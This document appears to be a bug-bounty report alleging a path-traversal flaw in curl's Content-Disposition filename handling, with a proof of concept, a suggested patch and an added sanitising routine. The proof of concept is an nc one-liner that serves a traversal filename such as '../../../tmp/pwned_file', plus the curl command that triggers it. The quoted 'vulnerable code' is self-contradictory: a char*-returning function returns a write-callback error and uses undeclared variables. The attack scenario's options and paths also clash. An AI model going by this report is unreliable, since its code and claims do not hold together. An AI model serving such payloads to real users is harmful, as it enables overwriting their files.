## Description

### Vulnerability Description
The parse_filename function in src/tool_cb_hdr.c does not adequately validate and sanitize filenames extracted from HTTP Content-Disposition headers, allowing directory traversal attacks when the -O (remote-name) and -J (remote-header-name) options are used together.
### Vulnerable Code Location

File: src/tool_cb_hdr.c
Function: parse_filename (lines ~230-300)

Affected Code Path:

```c
static char *parse_filename(const char *ptr, size_t len)
{
  // ... [filename extraction logic] ...
  if(per->config->output_dir) {
    outs->filename = curl_maprintf("%s/%s", per->config->output_dir,
                                   filename); // VULNERABLE: filename may contain path traversal
  }
  else
    outs->filename = filename;
  // File is created without adequate path traversal checks
  if(!tool_create_output_file(outs, per->config))
    return CURL_WRITEFUNC_ERROR;
}
```
### Attack Scenario

1. User runs: `curl -O -J http://malicious-server/file -o "/intended/output/dir"`
2. Malicious server responds with header: `Content-Disposition: attachment; filename="../../../etc/passwd"`
3. cURL creates the file at /etc/passwd instead of /intended/output/dir/etc/passwd
### Proof of Concept

Malicious Server Setup:

```sh
# Create a simple HTTP server that returns a malicious Content-Disposition header
echo -e "HTTP/1.1 200 OK\r\nContent-Disposition: attachment; filename=\"../../../tmp/pwned_file\"\r\nContent-Length: 6\r\n\r\nPWNED" | nc -l -p 8080
```

Exploit Command:

```sh
# User command that triggers the vulnerability
curl -O -J http://localhost:8080/malicious-file -o "/safe/output/directory"
# Result: File created at /tmp/pwned_file instead of /safe/output/directory/pwned_file
```
### Recommended Fix

```c
static char *parse_filename(const char *ptr, size_t len)
{
  char *copy = memdup0(ptr, len);
  if(!copy)
    return NULL;
  // Path traversal protection
  if(strstr(copy, "..") != NULL) {
    free(copy);
    return NULL; // Reject filenames with path traversal
  }
  // Additional sanitization for absolute paths
  if(copy[0] == '/') {
    free(copy);
    return NULL; // Reject absolute paths
  }
  // ... existing processing logic ...
}
```
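A substring check for `..` rejects legitimate names such as `notes..txt` and does not treat the backslash as a separator; the variant below, added here as example code that is not curl's own, instead keeps only the final path component of the header value and then refuses the degenerate results (`safe_basename` and `join_output` are hypothetical helper names).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not curl's code. Reduce a Content-Disposition filename to
 * its last path component and reject names that are still unusable.
 * Returns a malloc'ed string (caller frees) or NULL on rejection. */
char *safe_basename(const char *name, size_t len)
{
    size_t start = 0, i;
    /* Keep only what follows the last '/' or '\\', so "../../../etc/passwd"
     * becomes "passwd". Backslash counts too, since Windows accepts it. */
    for(i = 0; i < len; i++)
        if(name[i] == '/' || name[i] == '\\')
            start = i + 1;
    name += start;
    len -= start;
    /* Reject empty names and the special entries "." and "..". */
    if(len == 0 ||
       (len == 1 && name[0] == '.') ||
       (len == 2 && name[0] == '.' && name[1] == '.'))
        return NULL;
    /* Reject NUL and other control characters: a NUL would truncate the
     * path once it is formatted with "%s". */
    for(i = 0; i < len; i++)
        if((unsigned char)name[i] < 0x20 || name[i] == 0x7f)
            return NULL;
    char *copy = malloc(len + 1);
    if(!copy)
        return NULL;
    memcpy(copy, name, len);
    copy[len] = '\0';
    return copy;
}

/* Build "output_dir/<name>". Because safe_basename() runs first, the result
 * cannot leave output_dir. Returns NULL when the header name is unusable. */
char *join_output(const char *output_dir, const char *hdr_name, size_t len)
{
    char *base = safe_basename(hdr_name, len);
    if(!base)
        return NULL;
    size_t n = strlen(output_dir) + strlen(base) + 2;
    char *path = malloc(n);
    if(path)
        snprintf(path, n, "%s/%s", output_dir, base);
    free(base);
    return path;
}
```

With the report's header value, `join_output("/safe/output/directory", "../../../tmp/pwned_file", 23)` yields `/safe/output/directory/pwned_file`, while a value of `..` or `/` alone is rejected.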
## Impact

### Direct Impact

- Arbitrary File Write: Attackers can write files outside the intended output directory
- File Overwrite: Existing system files can be overwritten
- Privilege Escalation: When run with elevated privileges, can modify critical system files

### Attack Vectors

- Malicious Web Servers: Any compromised or malicious server can exploit this
- Man-in-the-Middle Attacks: Over unencrypted connections
- Cache Poisoning: If CDN or proxy caches are compromised
## Basic Information

- ID: H1:3408126
- Published: Nov 1, 2025 at 20:40
- Modified: Nov 1, 2025 at 21:22